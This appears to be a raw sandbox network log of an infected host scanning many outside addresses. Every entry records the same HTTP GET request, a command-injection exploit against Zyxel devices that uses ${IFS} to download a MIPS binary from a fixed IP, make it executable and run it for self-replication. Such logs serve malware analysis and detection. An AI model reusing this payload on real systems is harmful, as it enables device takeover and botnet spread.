                                            Jan 14, 2024 15:50:57.808173895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9255192.168.2.234078068.237.91.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808212996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9256192.168.2.2335600131.66.161.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808273077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9257192.168.2.2348020116.84.155.240443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808304071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9258192.168.2.2334002161.77.86.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808326006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9259192.168.2.2338400122.152.205.80443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808381081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9260192.168.2.2358688128.245.100.220443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808409929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9261192.168.2.2350010188.171.93.242443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808484077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9262192.168.2.234745634.152.52.135443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808506012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9263192.168.2.235134044.41.229.104443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808556080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9264192.168.2.2355042221.167.153.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808617115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9265192.168.2.233337636.217.121.29443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808651924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9266192.168.2.235694249.232.124.125443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808728933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9267192.168.2.233783242.59.200.83443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808753967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9268192.168.2.234470068.94.41.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808794975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9269192.168.2.2359950161.248.171.35443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808852911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9270192.168.2.235746014.75.57.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808893919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9271192.168.2.235283224.147.128.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808927059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9272192.168.2.233409219.188.134.54443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.808964968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9273192.168.2.234209482.171.127.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809031010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9274192.168.2.233429079.144.21.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809055090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9275192.168.2.235725832.120.26.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809118032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9276192.168.2.234760449.175.97.101443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809139013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9277192.168.2.2333440170.28.102.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809200048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9278192.168.2.2350030196.19.51.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809218884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9279192.168.2.2337510161.112.133.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809292078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9280192.168.2.233750051.232.124.165443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809355974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9281192.168.2.233960665.195.148.39443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809390068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9282192.168.2.2353774185.229.134.170443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809415102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9283192.168.2.2352620165.117.209.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809449911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9284192.168.2.235922098.105.58.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809524059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9285192.168.2.2335714165.151.181.115443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809561968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9286192.168.2.235176698.1.33.184443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809618950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9287192.168.2.2347474220.113.45.14443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809662104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9288192.168.2.234152664.68.146.43443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809705973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9289192.168.2.2350092159.107.158.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809747934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9290192.168.2.2349874117.208.123.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809815884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9291192.168.2.2347834179.111.208.30443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809832096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9292192.168.2.2341018152.17.244.136443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809871912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9293192.168.2.234505612.209.253.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.809914112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9294192.168.2.233487014.68.241.28443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810002089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9295192.168.2.234070071.229.29.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810019970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9296192.168.2.2359510207.4.21.179443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810051918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9297192.168.2.233849247.2.83.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810133934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9298192.168.2.2337852217.221.160.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810162067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9299192.168.2.235521023.232.220.31443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810192108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9300192.168.2.234843441.22.66.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810255051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9301192.168.2.233806449.236.212.169443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810297966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9302192.168.2.2343494211.196.74.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810333967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9303192.168.2.2345534203.135.228.209443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810386896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9304192.168.2.235001488.235.112.168443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810446978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9305192.168.2.2341464194.16.167.81443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810475111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9306192.168.2.2333066212.16.240.105443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810525894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9307192.168.2.234985049.142.190.140443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810554981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9308192.168.2.2360438199.168.39.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810587883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9309192.168.2.2357806206.185.92.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810616016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9310192.168.2.2338744171.101.1.19443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810662985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9311192.168.2.2353162167.201.48.92443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810693979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9312192.168.2.2341656216.141.19.65443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810755968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9313192.168.2.234422012.137.67.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810815096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9314192.168.2.23481065.191.61.246443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810839891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9315192.168.2.2356104170.66.156.16443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810878038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9316192.168.2.234525487.223.33.88443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:57.810933113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            9317192.168.2.2336262183.217.180.212443
                                            TimestampBytes transferredDirectionData
